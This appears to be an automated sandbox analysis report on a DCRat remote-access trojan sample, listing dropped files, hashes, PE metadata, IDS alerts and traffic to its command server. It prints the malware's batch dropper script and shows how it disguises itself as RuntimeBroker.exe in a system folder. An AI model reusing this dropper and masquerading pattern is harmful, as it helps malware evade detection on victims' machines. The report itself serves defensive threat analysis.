                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\QtLimbtNymPOHuXh.exe.log

                      Download File
                      Process:C:\Program Files\Mozilla Firefox\QtLimbtNymPOHuXh.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):1510
                      Entropy (8bit):5.380493107040482
                      Encrypted:false
                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                      MD5:EC75759911B88E93A2B5947380336033
                      SHA1:4D1472BBA520DBF76449567159CD927E94454210
                      SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                      SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\RuntimeBroker.exe.log

                      Download File
                      Process:C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):1510
                      Entropy (8bit):5.380493107040482
                      Encrypted:false
                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                      MD5:EC75759911B88E93A2B5947380336033
                      SHA1:4D1472BBA520DBF76449567159CD927E94454210
                      SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                      SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\wininit.exe.log

                      Download File
                      Process:C:\PerfLogs\wininit.exe
                      File Type:CSV text
                      Category:dropped
                      Size (bytes):1510
                      Entropy (8bit):5.380493107040482
                      Encrypted:false
                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                      MD5:EC75759911B88E93A2B5947380336033
                      SHA1:4D1472BBA520DBF76449567159CD927E94454210
                      SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                      SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                      Malicious:false
                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                      C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):201
                      Entropy (8bit):5.144662175201132
                      Encrypted:false
                      SSDEEP:6:hITg3Nou11r+DE1wvSDpvdLvKOZG1wkn23fW/MqG:OTg9YDEmUvdffOkx
                      MD5:9E5FDA113B9DC32FF026D626019B272F
                      SHA1:340CB1C35F65A475786A379000F17C71CD618D3B
                      SHA-256:C8D3B4B937B92C5ABADB5F4AFC7A6841588362D8A06A3B04860BEB1A0B08A965
                      SHA-512:F72CC0676F5917CEC2248C0D14704CD3AECAB4F75D8DCD00E3FC0F768846CC88A8D075375BBA9046B56963808E774C45C2E59933AA270503CB346EBE24FADD41
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\user\Desktop\7fGdoA6Inq.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\6PWFNNlUVO.bat"

                      C:\Users\user\AppData\Local\Temp\cBVY07R7fi

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):25
                      Entropy (8bit):4.403856189774723
                      Encrypted:false
                      SSDEEP:3:tlHMOI:/sn
                      MD5:4762458DB420CF36CA8F3EB3E1833C53
                      SHA1:235B95A8217DB86880EA08FFEB5A09A41F201FA6
                      SHA-256:2E3E9FE767A877D877D36F46EDEF22F2FA42A0D169ACE9CAEEC114E127310764
                      SHA-512:6BC9B1C61DF264FC9AAD4094C1299DC6E7E3A7B7F17178DC6FAC6FFDD0312954CC8CF4BC8BD01FB2CA9834D2CE0CAEFBC402EB205C0F53B5002221FC30D4C87A
                      Malicious:false
                      Preview:TzKcrIs5wLVvWiYQVCyinv4Mm

                      C:\Windows\System32\Microsoft.Bluetooth.Service\9e8d7a4ca61bd92aff00cc37a7a4d62a2cac998d

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:ASCII text, with very long lines (972), with no line terminators
                      Category:dropped
                      Size (bytes):972
                      Entropy (8bit):5.896395169886422
                      Encrypted:false
                      SSDEEP:24:gqs68JQEP5UyyWTQ3UomuEdfnx1oeFZP9PQg3tqav0zP18U:d2j5Uyy8hPfxGeFN9PQgdA1
                      MD5:FF52C233A27D0A461E98E6364FD02F97
                      SHA1:D327BED9DB916B01A649519FB60508B9C12B9362
                      SHA-256:258A22AE22B310CEA99707984F102C3FC045B3E5C5F9E40A604C9CEF4C0F5424
                      SHA-512:C6DF859DC2200927FE9D94394A6709B145C11026BFDB81B0F610743741417E25542AED8DA1B7F9A576B1A0B18DE7FDC23B22E883BB7CDA26555F02D75146E6CF
                      Malicious:false
                      Preview:76z1thnUc612sNRRP2XacHOZcyyECH8Cy6ciWudYosNh6I1W3qGv0CfzsaY5sjRV7zEvvs5fZ8vu4qdU6cKWANLwbn05ViqFa1kHEGlKvkW2Qv4C7E8PY5UtnSUH29K0RqTCFWQ01Ala1Tfpsy8Qjarfg1evwdRvafkkb16lyIYXT41TwoZEA3R18ygO1eEYsz9Wt4O01WcbCTLl9K9HDNuhOtmnVstTD9od5fk2ZiNnbzyom4Orf6UfEcI9SleJnIXDpsqdkHreAHGY57AbdCyHoJYdWkkyEDASbv94OvGYO0f7VtEUkDplTQYfTMGAg3a6Gx7J8GNs5a3yobHnfPOAXY9LXdkBoG1VZi0iw5Vd07q2Xj12FdeRoZiryvwefLEyjhZFkj0k3uKasGyxms6Kmjq9AJtAI17o31SzKwSfm3X3OI8s792xO3MA0ZEbz0cCxgh1x9mzaahsMxu2KBCJ9KZ9pS8vr1pwbVGslH48WCXyVdxDoMQyxTCmGhMfA1IivvQ0rCRCGEw7wlnLe4Gfk18ISdlD5Z7e3yCkN7Wm4OrtgFzf3BAGvm83xHiNaNHrGRD8iD8hielVKOmMnGK4Z1tR0JwFYILqH9nOC16zCchQBmtifVkTDNSOhvIZQ2JaS4OKlXKvKU16TdQNaOjCi2n3rYqQthiJTH8GXi6ILyIsVV4Ef48CTG1aRVdMq3CnvrmMfKz2Rb0tt4hVemvyig0MPhzCFubSvf7ossjVFGu2PIqXxHsEHOEP0Z67Uwwh9i7N73mvCatcw87H1bP7BXKhbrxSvmASTM3rKca3e6Bqflc2czG3hzglXawPFTAaaaJkEP7YBVdFWeCzO406fGveqSUtqKyK6kQEc2xN1s1LVaO3X6AKdD4Tpp3w5Nr0hSJwN8XVHmExPjIPDaVtKnq2p6Yw8BRoAAnDRcpZioD08HEGgote17q4lQGRjlWFVaxO5E7l

                      C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):2781721
                      Entropy (8bit):5.8972283510043395
                      Encrypted:false
                      SSDEEP:24576:l+O4GuNVHU+AH2FWxOYIOlIZBrlsQBYI63DSyve5fG:s3N5IO6OtsMYIxS
                      MD5:8B744166EECACE320158F4D0F704B13E
                      SHA1:B92636084B3BD914514BC44556C4803933D667A3
                      SHA-256:AA7A05956CA47E164A10A94D0BDBE01123B84EB01FAD5E581E1E72B10D93D5A9
                      SHA-512:641B3065E30186CCF9BA84CE6D345565763BBDB5FC1B1201C3F08FCE5466C2384250B85B4C0220D2B9E21C5A51FF5EF60E9B910E07107E2B7E06F97B4E429D27
                      Malicious:true
                      Yara Hits:
                      • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe, Author: ditekSHen
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 88%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ia.........."......j*..........*.. ....*...@.. ........................*.......*...@...................................*.O.....*.......................*...................................................... ............... ..H............text....i*.. ...j*................. ..`.rsrc.........*......l*.............@..@.reloc........*......p*.............@..B..................*.....H.............&.................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                      C:\Windows\System32\Microsoft.Bluetooth.Service\RuntimeBroker.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\7fGdoA6Inq.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Preview:[ZoneTransfer]....ZoneId=0

                      \Device\Null

                      Download File
                      Process:C:\Windows\System32\w32tm.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):151
                      Entropy (8bit):4.801627498046597
                      Encrypted:false
                      SSDEEP:3:VLV993J+miJWEoJ8FXbaXdS5E6HKvoTxvAqvj:Vx993DEUJXdS5EG1qM
                      MD5:188086EC85821A15B8A8546700FE8DEF
                      SHA1:0BCFDD9FEE1CE4A625DEC736A6BB2A21C3DA9E2D
                      SHA-256:8CA58F6A3921EBCCE14FE51D54A45954FD4B9DC60F1880939F5987329054904A
                      SHA-512:3E426EBB6B50798F1AF21D46109E0EC0C98C5264B6ADE2ED445ED0776AAD7592CEBCC063195D662750F68E118BDCE04F1896B51E5EC3A2A78A0F6902749BE753
                      Malicious:false
                      Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/12/2024 16:42:43..16:42:43, error: 0x80072746.16:42:48, error: 0x80072746.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Entropy (8bit):5.8972283510043395
                      TrID:
                      • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      • Win32 Executable (generic) a (10002005/4) 49.75%
                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                      • Windows Screen Saver (13104/52) 0.07%
                      • Generic Win/DOS Executable (2004/3) 0.01%
                      File name:7fGdoA6Inq.exe
                      File size:2'781'721 bytes
                      MD5:8b744166eecace320158f4d0f704b13e
                      SHA1:b92636084b3bd914514bc44556c4803933d667a3
                      SHA256:aa7a05956ca47e164a10a94d0bdbe01123b84eb01fad5e581e1e72b10d93d5a9
                      SHA512:641b3065e30186ccf9ba84ce6d345565763bbdb5fc1b1201c3f08fce5466c2384250b85b4c0220d2b9e21c5a51ff5ef60e9b910e07107e2b7e06f97b4e429d27
                      SSDEEP:24576:l+O4GuNVHU+AH2FWxOYIOlIZBrlsQBYI63DSyve5fG:s3N5IO6OtsMYIxS
                      TLSH:EFD5B438D02A84F7AB15EBED18422E4173932845CF5FACC72B54F9DD3278136A998CD6
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ia.........."......j*...........*.. ....*...@.. ........................*.......*...@................................

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0x6a89de
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6169E5E6 [Fri Oct 15 20:34:46 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                      Entrypoint Preview

                      Instruction
                      jmp dword ptr [00402000h]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2a898c0x4f.text
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2aa0000x2f4.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2ac0000xc.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x20000x2a69e40x2a6a00266742b08d3867c6d1c56087c515831cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rsrc0x2aa0000x2f40x400e0829dc9e2b6b9d06fd433bcdbaaf4fcFalse0.361328125data2.480856620029086IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x2ac0000xc0x20055c0ede8cf424d6470bb765619bf53f4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_VERSION0x2aa0580x29cdataEnglishUnited States0.49550898203592814

                      Imports

                      DLLImport
                      mscoree.dll_CorExeMain

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-12-11T20:47:08.931403+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44973078.24.221.19680TCP
                      2024-12-11T20:47:11.947042+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44973278.24.221.19680TCP
                      2024-12-11T20:47:16.634554+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44973678.24.221.19680TCP
                      2024-12-11T20:47:19.744052+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44974078.24.221.19680TCP
                      2024-12-11T20:47:41.447118+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44974478.24.221.19680TCP
                      2024-12-11T20:48:06.431659+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44977078.24.221.19680TCP
                      2024-12-11T20:48:09.560672+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44977778.24.221.19680TCP
                      2024-12-11T20:48:30.587834+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44982978.24.221.19680TCP
                      2024-12-11T20:48:33.631544+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.44983678.24.221.19680TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Dec 11, 2024 20:47:07.426420927 CET4973080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:07.546359062 CET804973078.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:07.546437025 CET4973080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:07.546973944 CET4973080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:07.666410923 CET804973078.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:08.890338898 CET804973078.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:08.898830891 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:08.898874044 CET4434973178.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:08.898935080 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:08.910032988 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:08.910053015 CET4434973178.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:08.931402922 CET4973080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.369997978 CET4434973178.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:10.370134115 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.374702930 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.374735117 CET4434973178.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:10.375221968 CET4434973178.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:10.415888071 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.445425987 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.445564985 CET4434973178.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:10.445655107 CET49731443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.449410915 CET4973080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.449651957 CET4973280192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.573852062 CET804973278.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:10.573924065 CET4973280192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.573942900 CET804973078.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:10.573993921 CET4973080192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.574151993 CET4973280192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:10.697984934 CET804973278.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:11.899104118 CET804973278.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:11.899796963 CET49733443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:11.899888992 CET4434973378.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:11.899962902 CET49733443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:11.900399923 CET49733443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:11.900438070 CET4434973378.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:11.901504993 CET49733443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:11.943371058 CET4434973378.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:11.947041988 CET4973280192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:13.352123022 CET4434973378.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:13.352238894 CET49733443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:13.352238894 CET49733443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:13.529715061 CET4973280192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:15.154644012 CET4973680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:15.274375916 CET804973678.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:15.274527073 CET4973680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:15.274884939 CET4973680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:15.394385099 CET804973678.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:16.594121933 CET804973678.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:16.617660046 CET49738443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:16.617763996 CET4434973878.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:16.617830992 CET49738443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:16.634553909 CET4973680192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:16.708415031 CET49738443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:16.708498955 CET4434973878.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:18.154517889 CET4434973878.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:18.154594898 CET49738443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.156081915 CET49738443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.156110048 CET4434973878.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:18.156579018 CET4434973878.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:18.197197914 CET49738443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.258691072 CET49738443192.168.2.478.24.221.196
                      Dec 11, 2024 20:47:18.258831978 CET4434973878.24.221.196192.168.2.4
                      Dec 11, 2024 20:47:18.258900881 CET49738443192.168.2.478.24.221.196
